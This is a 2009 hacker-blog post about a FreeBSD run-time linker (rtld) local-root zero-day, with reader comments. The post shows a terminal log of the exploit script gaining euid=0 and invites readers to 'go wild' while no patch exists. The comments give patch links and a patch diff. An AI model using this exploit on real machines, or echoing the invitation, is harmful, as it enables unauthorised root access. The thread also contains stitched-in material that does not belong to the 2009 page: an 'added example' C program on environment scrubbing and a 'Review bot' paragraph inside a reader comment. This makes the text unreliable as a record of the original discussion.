Kecoak Elektronik Indonesia

Defending Classical Hacker Mind since 1995

FreeBSD rtld 0day exploit

with 5 comments

Kingcope has published this local exploit to FD-Lists.

[bofh@begok ~/hack]$ uname -a
FreeBSD begok.xxxx.de 7.0-STABLE FreeBSD 7.0-STABLE #1: Fri Mar 27 11:24:51 WIT 2009     root@begok.xxxxx.de:/usr/obj/usr/src/sys/BEGOK  i386
[bofh@begok ~/hack]$ ./fbsd-local-2009.sh
fbsd-local-2009.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
8:35
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1007(bofh) gid=1007(bofh) euid=0(root) groups=1007(bofh)

This publication will obviously be put to use right away by hackers/crackers who can get local access to FreeBSD machines. As far as I can tell, there is no patch yet. So, go wild guys? :p.

** Thanks to temon for testing the exploit, as currently I don't have FBSD to test on. *sigh*.

Written by byteskrew

December 1st, 2009 at 11:52 am

Posted in 0day, Bug & Exploit, Underground


5 Responses to 'FreeBSD rtld 0day exploit'


  1. This bug affects all FreeBSD 7.x as well as the newest release, 8.0. An unofficial patch is here:
    http://people.freebsd.org/~cperciva/rtld.patch

    jackd@k-elektronik%uname -r
    7.1-RELEASE-p2
    jackd@k-elektronik%sh rtdl.sh
    DemoRTLD.sh SocketCode env env.c fbsd-rtld-full-package openssh program.c program.o rtdl.sh w00t.so.1.0 FreeBSD local r00t zeroday
    by Kingcope
    November 2009
    env.c: In function 'main':
    env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
    env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
    env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
    /libexec/ld-elf.so.1: environment corrupt; missing value for
    /libexec/ld-elf.so.1: environment corrupt; aborting
    jackd@k-elektronik%

    Stealth had already found this bug long before Kingcope published it to FD-LIST..
    http://c-skills.blogspot.com/2009/11/always-check-return-value.html

    jackd

    1 Dec 09 at 8:58 pm
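
The root cause this thread circles around is an ignored unsetenv(3) return value in the run-time linker: when the environment is malformed, the scrub of the LD_ variables fails, the failure is not checked, and the variables survive into a privileged program. The C program below is an added example (not from the post, the commenters, or FreeBSD's rtld) of the fail-closed pattern the patch in the thread introduces: remove a list of loader variables from an environment array, and refuse to proceed if the environment is not well formed. It works on a caller-supplied array of constructed entries rather than on the process's own environ, so it runs unprivileged and touches nothing real; the names scrub_env, env_well_formed, env_has, demo_scrub and demo_preload_left are assumed for the example.

```c
/* Added example: fail-closed environment scrubbing in the spirit of the
 * rtld fix. Not code from the original post, its commenters, or FreeBSD. */
#include <stdio.h>
#include <string.h>

/* Loader variables a privilege-changing program must not honour from an
 * untrusted caller; the list mirrors the names rtld clears. */
static const char *const dangerous[] = {
    "LD_PRELOAD", "LD_LIBMAP", "LD_LIBRARY_PATH",
    "LD_LIBMAP_DISABLE", "LD_DEBUG", NULL
};

/* Returns 1 if every entry of envp has the NAME=value shape with a
 * non-empty NAME, 0 otherwise. An entry with no '=' is the
 * "environment corrupt; missing value for" condition rtld reports. */
int env_well_formed(char *const *envp)
{
    for (; *envp != NULL; envp++) {
        const char *eq = strchr(*envp, '=');
        if (eq == NULL || eq == *envp)
            return 0;
    }
    return 1;
}

/* Remove every entry of envp whose name is listed in names[].
 * Returns the number of entries removed, or -1 (leaving envp untouched)
 * when the environment is malformed. Like the fixed rtld, the caller is
 * expected to abort on -1 rather than assume the scrub succeeded. */
int scrub_env(char **envp, const char *const *names)
{
    if (!env_well_formed(envp))
        return -1;
    int removed = 0;
    char **dst = envp;
    for (char **src = envp; *src != NULL; src++) {
        size_t namelen = (size_t)(strchr(*src, '=') - *src);
        int drop = 0;
        for (const char *const *n = names; *n != NULL; n++) {
            if (strlen(*n) == namelen && strncmp(*src, *n, namelen) == 0) {
                drop = 1;
                break;
            }
        }
        if (drop)
            removed++;
        else
            *dst++ = *src;   /* compact in place, preserving order */
    }
    *dst = NULL;
    return removed;
}

/* Does envp still carry a variable called name? */
int env_has(char *const *envp, const char *name)
{
    size_t len = strlen(name);
    for (; *envp != NULL; envp++)
        if (strncmp(*envp, name, len) == 0 && (*envp)[len] == '=')
            return 1;
    return 0;
}

/* Builds a constructed sample environment (corrupt != 0 adds an entry
 * with no '='), scrubs it, and returns scrub_env's result. If preload_left
 * is non-NULL it receives whether LD_PRELOAD survived the scrub. */
int demo_scrub(int corrupt, int *preload_left)
{
    /* Constructed sample values, not captured from any real system. */
    char *env[] = { "HOME=/home/user", "LD_PRELOAD=/tmp/example.so",
                    corrupt ? "CORRUPT" : "PATH=/bin", NULL };
    int r = scrub_env(env, dangerous);
    if (preload_left != NULL)
        *preload_left = env_has(env, "LD_PRELOAD");
    return r;
}

/* Convenience wrapper: 1 if LD_PRELOAD is still present after the scrub. */
int demo_preload_left(int corrupt)
{
    int left = 0;
    demo_scrub(corrupt, &left);
    return left;
}

int main(void)
{
    int r = demo_scrub(0, NULL);
    printf("well-formed env: scrub removed %d, LD_PRELOAD left: %d\n",
           r, demo_preload_left(0));
    r = demo_scrub(1, NULL);
    printf("corrupt env: scrub returned %d (fail closed), LD_PRELOAD left: %d\n",
           r, demo_preload_left(1));
    /* A privileged loader seeing -1 must abort, as the patch's die() does. */
    return 0;
}
```

The point of the second case is the one the patch makes: with a malformed environment the scrub cannot be trusted to have removed anything, so the only safe answer is to stop before any privileged code runs, not to carry on with LD_PRELOAD still set.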

  2. Colin Percival already made it:
    http://people.freebsd.org/~cperciva/rtld.patch
    That's for Release 6.x. The problem is that the patch doesn't work for Release 7.2 (my box is 7.2-RELEASE) because LD_ELF_HINTS_PATH doesn't exist there, but you can edit CPercival's patch and erase those elf hints lines, or you can grab it here:
    http://bit.ly/739WJ4
    Pretty lame, isn't it: after 24 hours there is still no patch published on the FBSD security page.

    Primata Tampan

    2 Dec 09 at 6:04 am

  3. For 7.2-REL you can use this patch:

    — /usr/src/libexec/rtld-elf/rtld.c 2008-11-25 03:59:29.000000000 +0100
    +++ /usr/src/libexec/rtld-elf/rtld.c.new 2009-12-01 13:09:15.000000000 +0100
    @@ -358,11 +358,12 @@
    /*
    *potentially un-safe variables.
    */
    if (!trust) {
    - unsetenv(LD_ “PRELOAD”);
    - unsetenv(LD_ “LIBMAP”);
    - unsetenv(LD_ “LIBRARY_PATH”);
    - unsetenv(LD_ “LIBMAP_DISABLE”);
    - unsetenv(LD_ “DEBUG”);
    + if (unsetenv(LD_ “PRELOAD”) || unsetenv(LD_ “LIBMAP”) ||
    + unsetenv(LD_ “LIBRARY_PATH”) || unsetenv(LD_ “LIBMAP_DISABLE”) ||
    + unsetenv(LD_ “DEBUG”)) {
    + _rtld_error(”environment corrupt; aborting”);
    + die();
    + }
    }
    ld_debug = getenv(LD_ “DEBUG”);
    libmap_disable = getenv(LD_ “LIBMAP_DISABLE”) != NULL;
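
    Review bot: as pasted, this hunk will not apply or compile without hand editing. The blog has turned the ASCII quotes into typographic ones in every unsetenv(LD_ "PRELOAD") line and in _rtld_error("environment corrupt; aborting"), the first file header line starts with a dash instead of "---", and the "@@ -358,11 +358,12 @@" counts do not match the 12 old / 13 new lines shown, so retype the quotes and header before feeding it to patch(1). The substance is right: chaining the unsetenv calls with || and calling die() on the first failure is exactly the fail-closed behaviour the vulnerability lacked, since rtld previously ignored the -1 that unsetenv returns for a corrupt environment and carried on with the LD_ variables still set.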

    Kalpi

    3 Dec 09 at 9:58 am

  4. @Permata Tampan: That patch is for 8.0; there is no patch for 6.x because it isn't affected.. For 7.x it indeed doesn't work, so manual editing is needed..

  5. bro, I'm a newcomer here.
    Teach me, please.

    d'elcano

    11 Dec 09 at 9:11 pm
